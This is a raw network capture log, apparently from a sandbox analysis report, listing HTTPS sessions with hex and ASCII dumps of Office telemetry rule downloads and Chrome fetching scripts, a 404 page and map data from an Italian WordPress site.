                                                                                                                                          2024-11-28 10:33:00 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          62192.168.2.44982413.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:00 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 408
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                          ETag: "0x8DC582BB56D3AFB"
                                                                                                                                          x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103300Z-174f7845968j6t2phC1EWRcfe80000000yd00000000078ea
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:00 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          63192.168.2.44982113.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:00 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:00 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 450
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                          ETag: "0x8DC582BD4C869AE"
                                                                                                                                          x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103300Z-174f78459685m244hC1EWRgp2c0000000y500000000041b3
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:00 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          64192.168.2.44982013.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:00 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:00 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 3788
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                          ETag: "0x8DC582BAC2126A6"
                                                                                                                                          x-ms-request-id: 19bd46a7-901e-0048-5f4e-41b800000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103300Z-174f7845968frfdmhC1EWRxxbw0000000y8g000000008kee
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:00 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          65192.168.2.4498185.57.42.1484432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:00 UTC655OUTGET /tentamus-agriparadigma-it/wp-content/uploads/sites/71/2017/02/faux-home.png HTTP/1.1
                                                                                                                                          Host: www.tentamus.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:03 UTC605INHTTP/1.1 404 Not Found
                                                                                                                                          Connection: close
                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                          transfer-encoding: chunked
                                                                                                                                          date: Thu, 28 Nov 2024 10:33:03 GMT
                                                                                                                                          server: LiteSpeed
                                                                                                                                          access-control-allow-methods: GET, POST, OPTIONS
                                                                                                                                          access-control-allow-headers: X-Requested-With
                                                                                                                                          access-control-allow-credentials: true
                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                          2024-11-28 10:33:03 UTC763INData Raw: 64 36 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6e 74 61 6d 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 61 75 74 6f 70 74 69 6d 69 7a 65 2f 63 73 73 2f 61 75 74 6f 70 74 69 6d 69 7a 65 5f 66 37 64 35 36 33 37 37 30 62 33 66 66 65 33 35 38 62 65 65 37 39 36 37 37 38 35 65 63 64 31 64 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 65 6e 74 61 6d 75 73 20 47 72 6f 75 70 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 63 68
                                                                                                                                          Data Ascii: d616<!DOCTYPE html><html lang="en"><head><link media="all" href="https://www.tentamus.com/wp-content/cache/autoptimize/css/autoptimize_f7d563770b3ffe358bee7967785ecd1d.css" rel="stylesheet"><title>Page not found - Tentamus Group</title><meta ch


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          66192.168.2.4498255.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:01 UTC589OUTGET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:01 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:01 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Wed, 31 May 2023 06:59:20 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 12943
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:01 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:01 UTC7876INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 65 3d 3e 4d 61 74 68 2e 61 62 73 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 2c 74 3d 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 20 61 3d 6e 65 77 20 4d 61 70 28 5b 5b 22 69 6e 69 74 22 2c 22 69 6e 69 74 22 5d 2c 5b 22 76 61 6c 69 64 61 74 69 6f 6e 5f 66 61 69 6c 65 64 22 2c 22 69 6e 76 61 6c 69 64 22 5d 2c 5b 22 61 63 63 65 70 74 61 6e 63 65 5f 6d 69 73 73 69 6e 67 22 2c 22 75 6e 61 63 63 65 70 74 65 64 22 5d 2c 5b 22 73 70 61 6d 22 2c 22 73 70 61 6d 22 5d 2c 5b 22 61 62 6f 72 74 65 64 22 2c 22 61 62 6f 72 74 65 64 22 5d 2c 5b 22 6d 61 69 6c 5f 73 65 6e 74 22 2c 22 73 65 6e 74 22 5d 2c 5b 22 6d 61 69 6c 5f 66 61 69 6c 65 64 22 2c 22 66 61 69 6c 65 64 22 5d 2c 5b 22 73 75 62
                                                                                                                                          Data Ascii: (()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t)=>{const a=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["sub
                                                                                                                                          2024-11-28 10:33:01 UTC5067INData Raw: 37 2e 69 64 7d 2f 72 65 66 69 6c 6c 60 2c 6d 65 74 68 6f 64 3a 22 47 45 54 22 2c 77 70 63 66 37 3a 7b 65 6e 64 70 6f 69 6e 74 3a 22 72 65 66 69 6c 6c 22 2c 66 6f 72 6d 3a 65 2c 64 65 74 61 69 6c 3a 6f 7d 7d 29 2e 74 68 65 6e 28 28 6e 3d 3e 7b 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 3f 28 64 65 6c 65 74 65 20 65 2e 77 70 63 66 37 2e 72 65 73 65 74 4f 6e 4d 61 69 6c 53 65 6e 74 2c 74 28 65 2c 22 6d 61 69 6c 5f 73 65 6e 74 22 29 29 3a 74 28 65 2c 22 69 6e 69 74 22 29 2c 6f 2e 61 70 69 52 65 73 70 6f 6e 73 65 3d 6e 2c 61 28 65 2c 22 72 65 73 65 74 22 2c 6f 29 7d 29 29 2e 63 61 74 63 68 28 28 65 3d 3e 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 29 29 7d 6e 2e 75 73 65 28 28 28 65 2c 61 29 3d 3e 7b 69 66 28 65 2e 77 70 63 66 37
                                                                                                                                          Data Ascii: 7.id}/refill`,method:"GET",wpcf7:{endpoint:"refill",form:e,detail:o}}).then((n=>{e.wpcf7.resetOnMailSent?(delete e.wpcf7.resetOnMailSent,t(e,"mail_sent")):t(e,"init"),o.apiResponse=n,a(e,"reset",o)})).catch((e=>console.error(e)))}n.use(((e,a)=>{if(e.wpcf7


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          67192.168.2.4498265.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:01 UTC407OUTGET /wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:01 UTC317INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:01 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Oct 2021 10:15:54 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 245638
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:01 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:01 UTC7875INData Raw: 61 6d 34 69 6e 74 65 72 6e 61 6c 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 28 5b 22 66 63 61 61 22 5d 2c 7b 41 54 7a 55 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 3b 77 69 6e 64 6f 77 2e 61 6d 34 67 65 6f 64 61 74 61 5f 77 6f 72 6c 64 4c 6f 77 3d 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 66 65 61 74 75 72 65 73 3a 5b 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 50 6f 6c 79 67 6f 6e 22 2c 63 6f 6f 72 64 69 6e 61 74 65 73 3a 5b 5b 5b 31 37 39 2e 32 32 32 33 2c 2d 38 2e 35 35 34 5d 2c 5b
                                                                                                                                          Data Ascii: am4internal_webpackJsonp(["fcaa"],{ATzU:function(e,t,o){"use strict";Object.defineProperty(t,"__esModule",{value:!0});window.am4geodata_worldLow={type:"FeatureCollection",features:[{type:"Feature",geometry:{type:"Polygon",coordinates:[[[179.2223,-8.554],[
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 2c 69 64 3a 22 57 53 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 50 6f 6c 79 67 6f 6e 22 2c 63 6f 6f 72 64 69 6e 61 74 65 73 3a 5b 5b 5b 2d 31 37 38 2e 30 34 36 37 2c 2d 31 34 2e 33 31 38 34 5d 2c 5b 2d 31 37 38 2e 31 35 38 35 2c 2d 31 34 2e 33 31 31 38 5d 2c 5b 2d 31 37 38 2e 31 34 32 33 2c 2d 31 34 2e 32 34 32 35 5d 2c 5b 2d 31 37 38 2e 30 34 36 37 2c 2d 31 34 2e 33 31 38 34 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 57 61 6c 6c 69 73 20 61 6e 64 20 46 75 74 75 6e 61 22 2c 69 64 3a 22 57 46 22 7d 2c 69 64 3a 22 57 46 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 4d 75 6c 74 69 50 6f 6c 79 67 6f 6e 22 2c 63 6f
                                                                                                                                          Data Ascii: ,id:"WS"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[-178.0467,-14.3184],[-178.1585,-14.3118],[-178.1423,-14.2425],[-178.0467,-14.3184]]]},properties:{name:"Wallis and Futuna",id:"WF"},id:"WF"},{type:"Feature",geometry:{type:"MultiPolygon",co
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 39 36 32 33 2c 35 35 2e 37 39 34 38 5d 2c 5b 2d 31 36 31 2e 30 39 39 35 2c 35 35 2e 34 30 35 37 5d 2c 5b 2d 31 36 31 2e 37 34 31 36 2c 35 35 2e 33 39 31 31 5d 2c 5b 2d 31 36 32 2e 30 37 34 31 2c 35 35 2e 31 33 39 34 5d 2c 5b 2d 31 36 32 2e 38 36 35 31 2c 35 34 2e 39 35 34 35 5d 2c 5b 2d 31 36 32 2e 39 36 32 31 2c 35 35 2e 31 38 33 38 5d 2c 5b 2d 31 36 32 2e 31 35 37 31 2c 35 35 2e 37 31 39 35 5d 2c 5b 2d 31 36 31 2e 32 31 35 36 2c 35 36 2e 30 32 31 34 5d 2c 5b 2d 31 36 30 2e 38 35 31 34 2c 35 35 2e 37 37 31 39 5d 2c 5b 2d 31 36 30 2e 33 30 32 31 2c 35 36 2e 33 31 34 31 5d 2c 5b 2d 31 35 39 2e 32 38 33 31 2c 35 36 2e 36 38 38 36 5d 2c 5b 2d 31 35 38 2e 33 32 31 2c 35 37 2e 32 39 37 38 5d 2c 5b 2d 31 35 37 2e 36 30 37 37 2c 35 37 2e 36 30 31 34 5d 2c 5b 2d
                                                                                                                                          Data Ascii: 9623,55.7948],[-161.0995,55.4057],[-161.7416,55.3911],[-162.0741,55.1394],[-162.8651,54.9545],[-162.9621,55.1838],[-162.1571,55.7195],[-161.2156,56.0214],[-160.8514,55.7719],[-160.3021,56.3141],[-159.2831,56.6886],[-158.321,57.2978],[-157.6077,57.6014],[-
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 5d 2c 5b 32 33 2e 36 30 35 33 2c 35 31 2e 35 31 37 39 5d 2c 5b 32 34 2e 33 36 31 37 2c 35 31 2e 38 36 37 34 5d 2c 5b 32 35 2e 39 32 35 31 2c 35 31 2e 39 31 33 36 5d 2c 5b 32 37 2e 31 34 32 32 2c 35 31 2e 37 35 32 5d 2c 5b 32 37 2e 32 37 30 31 2c 35 31 2e 36 31 33 35 5d 2c 5b 32 38 2e 35 39 39 31 2c 35 31 2e 35 34 32 37 5d 2c 5b 32 39 2e 31 33 35 37 2c 35 31 2e 36 31 37 33 5d 2c 5b 32 39 2e 33 34 36 36 2c 35 31 2e 33 38 32 35 5d 2c 5b 33 30 2e 35 33 33 31 2c 35 31 2e 35 39 36 34 5d 2c 5b 33 30 2e 39 38 30 36 2c 35 32 2e 30 34 36 31 5d 2c 5b 33 31 2e 37 36 33 36 2c 35 32 2e 31 30 31 32 5d 2c 5b 33 32 2e 35 30 38 2c 35 32 2e 33 30 38 34 5d 2c 5b 33 33 2e 37 33 35 33 2c 35 32 2e 33 34 34 38 5d 2c 5b 33 34 2e 33 39 37 36 2c 35 31 2e 37 38 30 34 5d 2c 5b 33 34
                                                                                                                                          Data Ascii: ],[23.6053,51.5179],[24.3617,51.8674],[25.9251,51.9136],[27.1422,51.752],[27.2701,51.6135],[28.5991,51.5427],[29.1357,51.6173],[29.3466,51.3825],[30.5331,51.5964],[30.9806,52.0461],[31.7636,52.1012],[32.508,52.3084],[33.7353,52.3448],[34.3976,51.7804],[34
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 34 30 2e 36 35 37 32 5d 2c 5b 37 30 2e 34 34 31 37 2c 34 31 2e 30 32 33 34 5d 2c 5b 37 30 2e 37 35 31 31 2c 34 30 2e 37 33 39 37 5d 2c 5b 37 30 2e 33 38 32 36 2c 34 30 2e 34 35 33 34 5d 2c 5b 37 30 2e 39 35 37 39 2c 34 30 2e 32 33 39 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 54 61 6a 69 6b 69 73 74 61 6e 22 2c 69 64 3a 22 54 4a 22 7d 2c 69 64 3a 22 54 4a 22 7d 2c 7b 74 79 70 65 3a 22 46 65 61 74 75 72 65 22 2c 67 65 6f 6d 65 74 72 79 3a 7b 74 79 70 65 3a 22 50 6f 6c 79 67 6f 6e 22 2c 63 6f 6f 72 64 69 6e 61 74 65 73 3a 5b 5b 5b 31 30 30 2e 31 32 32 35 2c 32 30 2e 33 31 36 37 5d 2c 5b 31 30 30 2e 35 34 32 39 2c 32 30 2e 30 38 38 35 5d 2c 5b 31 30 30 2e 33 39 37 37 2c 31 39 2e 37 35 36 31 5d 2c 5b 31 30 30 2e 36 32 35 34 2c 31 39
                                                                                                                                          Data Ascii: 40.6572],[70.4417,41.0234],[70.7511,40.7397],[70.3826,40.4534],[70.9579,40.239]]]},properties:{name:"Tajikistan",id:"TJ"},id:"TJ"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[100.1225,20.3167],[100.5429,20.0885],[100.3977,19.7561],[100.6254,19
                                                                                                                                          2024-11-28 10:33:01 UTC8000INData Raw: 32 31 2e 33 39 30 37 2c 34 32 2e 37 35 31 35 5d 2c 5b 32 31 2e 30 35 36 39 2c 34 33 2e 30 39 31 35 5d 2c 5b 32 30 2e 33 34 34 35 2c 34 32 2e 38 32 37 38 5d 2c 5b 31 39 2e 35 35 31 37 2c 34 33 2e 32 31 32 32 5d 2c 5b 31 39 2e 31 39 34 33 2c 34 33 2e 35 33 33 31 5d 2c 5b 31 39 2e 34 38 38 32 2c 34 33 2e 37 30 33 36 5d 2c 5b 31 39 2e 31 35 31 37 2c 34 34 2e 33 30 32 34 5d 2c 5b 31 39 2e 33 35 36 38 2c 34 34 2e 38 35 38 36 5d 2c 5b 31 39 2e 30 30 37 2c 34 34 2e 38 36 39 33 5d 2c 5b 31 39 2e 30 35 34 39 2c 34 35 2e 35 32 37 31 5d 2c 5b 31 38 2e 39 30 35 34 2c 34 35 2e 39 33 31 35 5d 2c 5b 31 39 2e 35 33 30 38 2c 34 36 2e 31 35 35 32 5d 2c 5b 32 30 2e 32 34 31 39 2c 34 36 2e 31 30 38 36 5d 5d 5d 7d 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 6e 61 6d 65 3a 22 53 65
